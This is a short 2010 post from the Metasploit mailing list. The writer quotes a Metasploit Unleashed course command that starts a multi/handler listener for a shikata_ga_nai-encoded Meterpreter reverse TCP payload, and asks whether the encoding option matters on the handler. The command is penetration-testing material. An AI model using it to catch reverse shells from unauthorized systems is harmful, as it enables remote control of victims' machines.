Metasploit mailing list archives

Encoding when multi/handler


From: Robin Wood <dninja () gmail com>
Date: Fri, 29 Jan 2010 23:10:37 +0000

I've finally got back to the Metasploit Unleashed course and on the
"VBScript Infection Methods" section there is this line:

root@bt4:/pentest/exploits/framework3# ./msfcli exploit/multi/handler
PAYLOAD=windows/meterpreter/reverse_tcp ENCODING=shikata_ga_nai
LPORT=8080 LHOST=10.211.55.162 E

This is waiting for a shikata_ga_nai encoded payload, but is there any
point in including the ENCODING statement in this line?

Robin
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework


Current thread: